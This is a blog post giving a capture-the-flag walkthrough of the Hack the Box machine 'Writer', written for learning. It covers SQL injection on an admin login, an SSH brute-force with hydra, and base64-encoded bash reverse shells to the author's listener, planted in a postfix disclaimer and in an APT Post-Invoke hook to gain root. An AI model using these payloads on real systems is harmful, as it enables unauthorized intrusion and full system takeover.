DEV Community

Cover image for Let's Hack this Box - Writer (Writeup)
Berkcan Uçan
Berkcan Uçan

Posted on

Let's Hack this Box - Writer (Writeup)

Hello guys! This is my first post here. I am planning to post Hack the Box writeups, Web Dev logs and also my Kaggle journeys. Today I am going to work on Writer.

Before start, please try to pawn this machine by yourself first.

"Writer" is rated as Medium difficulty (Linux) machine, we'll see how it goes! I usually start with nmap to see what's going on.

  • nmap is a must have tool to find open ports, services, which OS host uses etc.

nmap scan

alcadramin@archlinux ➜ ~  sudo nmap -sC -sV -sS -A 10.10.11.101
Enter fullscreen mode Exit fullscreen mode
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-03 07:00 +03
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 07:00 (0:00:00 remaining)
Nmap scan report for 10.10.11.101
Host is up (0.075s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/3%OT=22%CT=1%CU=42753%PV=Y%DS=2%DC=T%G=Y%TM=61A9966
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 15m52s
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-03T04:16:28
|_  start_date: N/A

TRACEROUTE (using port 3306/tcp)
HOP RTT      ADDRESS
1   73.43 ms 10.10.14.1
2   73.95 ms 10.10.11.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.84 seconds
Enter fullscreen mode Exit fullscreen mode

We can clearly see that we've a HTTP server let's check what's inside 👀.

Writer Website

Finding URI's with gobuster

Nothing interesting, let's find URI's (directories) with gobuster, which usually leads us to some goodies.

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).
  • Virtual Host names on target web servers.
  • Open Amazon S3 buckets
alcadramin@archlinux ➜ wordlists  gobuster dir -u 10.10.11.101 -w directory-list-2.3-small.txt 
Enter fullscreen mode Exit fullscreen mode
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.101
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/03 07:22:14 Starting gobuster in directory enumeration mode
===============================================================
/contact              (Status: 200) [Size: 4905]
/about                (Status: 200) [Size: 3522]
/static               (Status: 301) [Size: 313] [--> http://10.10.11.101/static/]
/logout               (Status: 302) [Size: 208] [--> http://10.10.11.101/]       
/dashboard            (Status: 302) [Size: 208] [--> http://10.10.11.101/]       
/administrative       (Status: 200) [Size: 1443]                                 

===============================================================
2021/12/03 07:33:27 Finished
===============================================================
Enter fullscreen mode Exit fullscreen mode

administrative seem's interesting.

Administrative Page

We've a good old login form, we can check if it's vulnerable to SQL injections, request capturing etc. Let's take a look with Burp Suite!

Burp POST

SQL Injection

Hmm, I've tried weak passwords etc. nothing works, let's try with UNION which is a common SQL vulnerability.

Burp SQL Query

Yay! 🎉 It is vulnerable to SQL injections. I'm just gonna try this request with sqlmap as well. PS: Just copy the request from Burp and save it to a file then pass it to sqlmap with -r.

alcadramin@archlinux ➜ Writer  sqlmap -r request 
Enter fullscreen mode Exit fullscreen mode

sqlmap

Yep it's very clear now, let's continue with Burp.

Burp Injection Success

Burp Injection Success Page Render

We're in. I am going to login with admin' ;**^ query. I've checked dashboard and found we can try to upload image and try to get shell however since we can SQL inject, I'm gonna find users and try to brute-force ssh.

Dashboard

So I've just quickly writed down an injection (you can see the original one in sqlmap screenshot) to get /etc/passwd.

Burp Injection passwd

We can see our users!

Burp Injection passwd 2

SSH Brute-force

We've kyle and john, let's try to brute-force kayle with hydra. (I've tried john as well and waited long time couldn't crack it, so gonna continue with kyle)

kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/bash
Enter fullscreen mode Exit fullscreen mode
salcadramin@archlinux ➜ Writer  sudo hydra -l kyle -P ~/pwn/wordlists/rockyou.txt ssh://10.10.11.101 -VV -f -t 60
Enter fullscreen mode Exit fullscreen mode

Not so long after, we've found their password!

hydra

And let's connect with ssh! (Someone was already here)

shell 1

Let's check the ports see if we can find something vulnerable.

netstat

We can get our user hash now, unfortunately kyle doesn't have sudo access so we'll try to reverse shell to john with SMTP. (No suprise 👀)

After some research I've come accross with this repository, which basically allows you to remap ports to desired one : https://github.com/cw1997/NATBypass

I'm going to compile it and upload to kyle with sftp.

alcadramin@archlinux ➜ ~  sftp kyle@10.10.11.101
kyle@10.10.11.101's password: 
Connected to 10.10.11.101.
sftp> put /home/alcadramin/pwn/natbypass
Enter fullscreen mode Exit fullscreen mode

Generate the reverse shell payload with base64.

alcadramin@archlinux ➜ ~  echo -n '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.174/7678 0>&1"' | base64
L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzMxMzYgMD4mMSI=
Enter fullscreen mode Exit fullscreen mode

Let's run the tool and bind it to a random IP.

Natbypass

Now we'll add our payload to /etc/postfix/disclaimer and listen through ncat.

Revshell

echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0Lzc2NzggMD4mMSI= | base64 -d | bash
Enter fullscreen mode Exit fullscreen mode

Now that they're done, I'm gonna write a script with Ruby to send an email and execute the payload.

#!/usr/bin/env ruby

require 'net/smtp'
require 'openssl'
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE

message = <<MESSAGE_END
Hey John, give me your shell pls.
MESSAGE_END

Net::SMTP.start('10.10.11.101', 3137) do |smtp|
  smtp.send_message message, 'kyle@10.10.11.101', 'john@10.10.11.101'
end
Enter fullscreen mode Exit fullscreen mode

Hey we're in John now. I've quickly realise there is a private ssh key, so I can use that to connect with ssh!

nc capture

ssh key

We can check John's groups.

john@writer:~$ id
uid=1001(john) gid=1001(john) groups=1001(john),1003(management)
Enter fullscreen mode Exit fullscreen mode

I am just gonna upload pspy64 to John via sftp and check running processes.

alcadramin@archlinux ➜ Writer  sftp -i john_key john@10.10.11.101
Connected to 10.10.11.101.
sftp> put /home/alcadramin/pwn/pspy64
Enter fullscreen mode Exit fullscreen mode

Privilege Escalation

So I ran pspy64 and realise this naughty boy is running APT via cron and we also have access to APT hooks so we can create a payload in /etc/apt/apt.conf.d. (https://wiki.debian.org/AptConfiguration)

2021/12/03 18:08:02 CMD: UID=0    PID=27301  | /usr/bin/apt-get update 
2021/12/03 18:09:01 CMD: UID=0    PID=27326  | /usr/sbin/CRON -f 
Enter fullscreen mode Exit fullscreen mode
echo 'APT::Update::Post-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzEyMTIgMD4mMSI= | base64 -d | bash"};'> 01payload
Enter fullscreen mode Exit fullscreen mode

And we got root access!

root

Finally I'm submitting my hashes!

pawned

  • Thank you for reading this article, hope you've had fun and learned something! See you next time!

Top comments (0)